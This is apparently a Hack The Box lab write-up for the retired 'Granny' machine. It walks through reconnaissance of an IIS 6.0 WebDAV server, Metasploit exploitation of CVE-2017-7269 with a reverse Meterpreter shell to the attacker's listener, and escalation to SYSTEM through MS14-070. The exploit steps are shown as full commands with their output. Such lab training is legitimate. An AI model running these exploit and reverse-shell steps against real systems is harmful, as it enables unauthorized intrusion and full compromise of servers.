Keep Calm and Hack The Box – Granny
Hack The Box (HTB) is an online platform allowing you to test and advance your penetration testing and cybersecurity skills. It contains a wide variety of challenges simulating real-world scenarios and vulnerabilities. Granny is one of the retired HTB machines rated as easy difficulty.
In this write-up, we‘ll walk through the process of compromising Granny from an unauthenticated remote attacker to full system access. We‘ll see how a combination of an outdated web server version and missing security patches can have severe consequences.
Reconnaissance
The first step in penetration testing is conducting thorough reconnaissance of the target system. We want to gather as much information as possible to identify potential attack vectors.
Our initial port scan using Nmap reveals that Granny has a single port open – TCP port 80 running an HTTP server:
$ nmap -sV -sC -p- granny.htb
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.031s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
|_http-webdav-scan: WebDAV enabled (PROPFIND)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The scan reveals some key information:
- The HTTP server is Microsoft IIS version 6.0
- The website appears to be "Under Construction"
- WebDAV (Web Distributed Authoring and Versioning) is enabled
- Several potentially risky HTTP methods like PUT and MOVE are allowed
IIS 6.0 is a legacy version released in 2003 and is no longer supported by Microsoft. It has several known vulnerabilities that were patched over the years. WebDAV is an extension of HTTP that allows clients to perform remote content authoring operations.
Let‘s do some further enumeration on the WebDAV functionality using davtest:
$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: YzE318b6Dqcqjp
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT php FAIL
PUT jhtml FAIL
PUT cgi FAIL
PUT asp FAIL
PUT aspx FAIL
PUT pl FAIL
PUT shtml FAIL
PUT cfm FAIL
PUT txt SUCCEED: http://granny.htb/DavTestDir_YzE318b6Dqcqjp/davtest_YzE318b6Dqcqjp.txt
********************************************************
Checking for test file execution
EXEC txt FAIL
********************************************************
The output indicates that while WebDAV is enabled, we aren‘t able to upload or execute any files on the server. Let‘s check if there are any known exploits for IIS 6.0 and WebDAV using Searchsploit:
$ searchsploit iis 6.0
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1 | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl‘ Remote B | windows/remote/41738.py
----------------------------------------------------------- ---------------------------------
Searchsploit found an exploit for a remote buffer overflow in the ScStoragePathFromUrl function of WebDAV. Let‘s examine the exploit code:
$ searchsploit -x 41738.py
...
# Exploit Title: Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl‘ Remote Buffer Overflow
# Exploit Author: Zhiniang Peng & Chen Wu
...
# CVE : CVE-2017-7269
...
The comments mention that this is CVE-2017-7269, a well-known vulnerability in IIS 6.0 WebDAV. It allows remote code execution by sending a crafted HTTP request with a long header. The vulnerability was disclosed in 2017 and has been widely exploited in the wild since then.
Exploitation
We‘ll use the Metasploit module exploit/windows/iis/iis_webdav_scstoragepathfromurl to exploit this vulnerability and gain an initial foothold on Granny.
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts granny.htb
rhosts => granny.htb
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.22:4444 -> 10.10.10.15:1030) at 2022-02-18 14:01:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
The exploit was successful and provided us a Meterpreter shell on the target system running with NETWORK SERVICE privileges. While this is a good start, we don‘t have full control over the system yet.
Privilege Escalation
To find potential privilege escalation vectors, we‘ll use Meterpreter‘s local_exploit_suggester module:
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_040_afi: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
The scan found several potential local privilege escalation exploits. The most interesting one appears to be ms14_070_tcpip_ioctl, which exploits a vulnerability in the Windows tcpip.sys driver to gain SYSTEM privileges.
Let‘s background our current shell and launch the local exploit:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.22:4444 -> 10.10.10.15:1047) at 2022-02-18 14:15:41 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Success! We were able to leverage the vulnerability to gain full SYSTEM privileges on Granny. We now have complete control over the machine.
Post-Exploitation
With our high-privileged shell, let‘s hunt for the user and root flags to complete the machine.
The user flag can be found in C:\Documents and Settings\Lakis\Desktop\user.txt:
meterpreter > cat "C:\Documents and Settings\Lakis\Desktop\user.txt"
700c5dc163014e22b3e408f8703f67d1
And the root flag is located at C:\Documents and Settings\Administrator\Desktop\root.txt:
meterpreter > cat "C:\Documents and Settings\Administrator\Desktop\root.txt"
aa4beed1c0584445ab463a6747bd06e9
With that, we pwned Granny and obtained both flags!
Conclusion
In this write-up, we saw how an outdated and unpatched IIS 6.0 server can be easily compromised by a remote attacker using publicly available exploits. The CVE-2017-7269 WebDAV vulnerability allowed us to gain an initial foothold, and we escalated privileges with the MS14-070 local privilege escalation exploit to gain complete control.
This underscores the importance of keeping systems up-to-date with the latest security patches, especially internet-facing servers. Additional hardening like disabling unnecessary WebDAV functionality can also help prevent these types of attacks.
I hope you enjoyed this write-up and learned something new! Feel free to comment below with any questions or feedback. Check out some of my other HTB write-ups to learn more:
- Keep Calm and Hack The Box – Lame
- Keep Calm and Hack The Box – Legacy
- Keep Calm and Hack The Box – Beep
Until next time, keep hacking the box and stay secure!